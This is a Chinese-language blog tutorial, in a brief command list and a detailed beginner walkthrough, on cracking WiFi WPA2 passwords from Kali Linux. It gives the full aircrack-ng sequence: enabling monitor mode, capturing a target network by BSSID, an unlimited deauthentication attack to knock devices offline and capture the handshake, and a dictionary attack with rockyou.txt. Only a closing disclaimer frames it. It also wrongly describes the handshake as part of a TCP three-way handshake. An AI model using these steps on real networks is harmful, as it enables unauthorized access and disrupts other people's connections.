admin管理员组

文章数量:1516870

前提(不适合小白,适合初学)

本文章提供仅学习,研究,参考 ,不提供技术支持,如出现使用违法情况,与作者无关,阅读使用者自行承担相应法律责任,有必要联系我删除文章!!!

Kall系统下载官网:谷歌浏览器访问

1.Kali 2022版本

2.账号kali 密码 kali

3.建议命令前面 使用sudo (临时权限)

4. VMware Workstation 15.5以上 虚拟机

5. 在虚拟机安装好kail linunx系统 具体怎么安装……度,so,bing,google一下

6. 无线网卡(芯片为3070 以上 1887L 3072L 可以 支持Linux 系统 补充:普通的网卡不支持监听功能

无线网卡监听收发-破解wifi密码

P1.简化(解决方案、图片、解释不提供-只提供命令注释过程,想看细节以及解决问题p2 ):

(命令+注释)

  1. sudo airmon-n g ----检查网卡是否正常
  2. I fconfig ----查看网卡信息(无线默认名称wlan0)
  3. sudo airmon-ng start wlan0 ----开启网卡监听模式
  4. I wconfig ----查看wlan0网卡信息 (变成wlan0mon)
  5. sudo airodump-ng wlan0mon ----开始扫描wifi信号
  6. sudo airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home wlan0mon

解释:--bssid = wifi的型号mac地址 、-c = 信号通道 , -w = 文件前名字(名字.wifi.01_1cap)

7、sudo aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon

解释:-0 数字(攻击次数), -c 手机、平板、电脑等其他设备mac地址 ,-a wifi设备mac地址

8、 解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz

gzip -d/usr/share/wordlists/rockyou.txt.gz

9、键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破

aircrack-ng -w /usr/share/wordlists/rockyou.txt  /home/wifi-0.1.cap

耐心等待密码破解吧…

P 2.细化(提供图片过程、说明、扩展,解决、适合初学者、需要一定网络、程序知识)

第一步:打开VM虚拟机(16.5)里面的kali系统

等待进入系统……

好的,进入到系统登录界面了,有没有认真看前提呢?密码是什么呢?

能登录成功,说明你有真正的在学习呢!泪目wu……

哎嘿!好了好了我们往下第二步吧

第二步:

Ctrl+alt+T打开终端程序

输入: sudo airmon-ng ( 哎哎先不要急输入命令 )

扩展:虚拟机先做个快照然后再去做实验(具体怎么做快照,enmmm,我就不多说了)

输入出现:su: user airmon-ng does not exist or the user entry does not contain all the required fields(目录不存在)

解决方法如下: 先在window主机上按win+r键然后输入services.msc 回车

找到 VMware USB Arbitration Service ,双击

启动类型改为 自动 2. 启动 服务状态3. 确定

的设置,改成跟下图一样(如果为灰色无法更改,则需要关闭kail系统后再改)

将usb无线网卡插在电脑上,( 我这里是淘宝买的3072L芯片的网卡

点击 虚拟机 > 可移动设备 > 选择 802.11n WLAN > 连接

命令ifconfig查看网卡信息,天啊!出现了wlan0!说明已经连接成功了

那就输入命令 sudo airmon-ng start wlan0 开启网卡监听模式吧 嗨哎嗨!

输入 iwconfig 命令查看网卡信息, wlan0mon网卡名加了mon则表示成功

命令 sudo airodump-ng wlan0mon ,开始扫描WiFi,按ctrl+c结束任务

我这里说明一下傲!

BSSID:指wifi的mac地址就是设备的物理地址

PWR:wifi距离你接收的信号强度,数值小说明,离你近

DATA:上行和下行的数据包,越大数据说明有人在下载或者播放不可描述的……

CH:一般家用2.4G信道为13个(1-13数字)

ESSID:wifi的名称(中文命名可能会****)

好吧,我已经介绍完了接下来输入你抓到的数据去……额 学习!!!!

sudo airodump-ng --bssid BSSID -c 信道频率 -w 存储的路径名称 wlan0mon

新打开终端

进入/home文件夹:cd /home

创建一个叫wifi的文件夹 来放抓包数据:sudo mkdir “文件路径” 补充:如果要删除文件 请使用rm来删除:sudo rm -f 文件路径

哎!不懂怎么删除创建和 “../ ./ ”什么意思、查看,建议去温习一下Linux基本指令再来做实验

用LS、LL、LS-a查看已经创建成功,没创建成功命令前面加sudo (调用临时root权限)

创建好文件夹-继续输入你想研究的对象……呸是wifi的mac地址和信道。。如下命令

sudo airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home wlan0mon

数据包已经正在抓取

重点的来了!!!

sudo aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon

注意!:在敲上面的命令的时候↑

先把全局扫描wifi关了,会一定的影响到信道抓包

-0 0 : 发送的干扰包次数

-c : 手机、平板、笔记本、电视设备的mac地址

-a:wifi mac地址

wlan0mon :最后是网卡名称(一般就是这个名字)

原理是 发送伪造帧攻击 让对方的连接中wifi掉线,然后进行重连,中间会发送tcp包含三次握手里面有wifi密码w pa 2加密密钥

回到监听画面,出现wpa handshake的时候就抓包成功了

抓完包记得关掉:停止wlan0mon 监听 :sudo airmon-ng wlan0mon

两个终端都要按Ctrl+c停止哦!,要不然那边会一直连接不到wifi哈哈!

cd打开抓包的目录,ls列出来,就看到我们抓到的数据包 “wifi-0.1.cap”这个就是握手包

解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz

S udo gzip -d/usr/share/wordlists/rockyou.txt.gz

输入sudo aircrack-ng -w 字典路径 握手包路径,回车后开始爆破

S udo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi/wifi-0.1.cap

禁止!使用非法用途!违规者自己承担法律责任,与作者无关!在此声明!

本文标签: 命令编程密码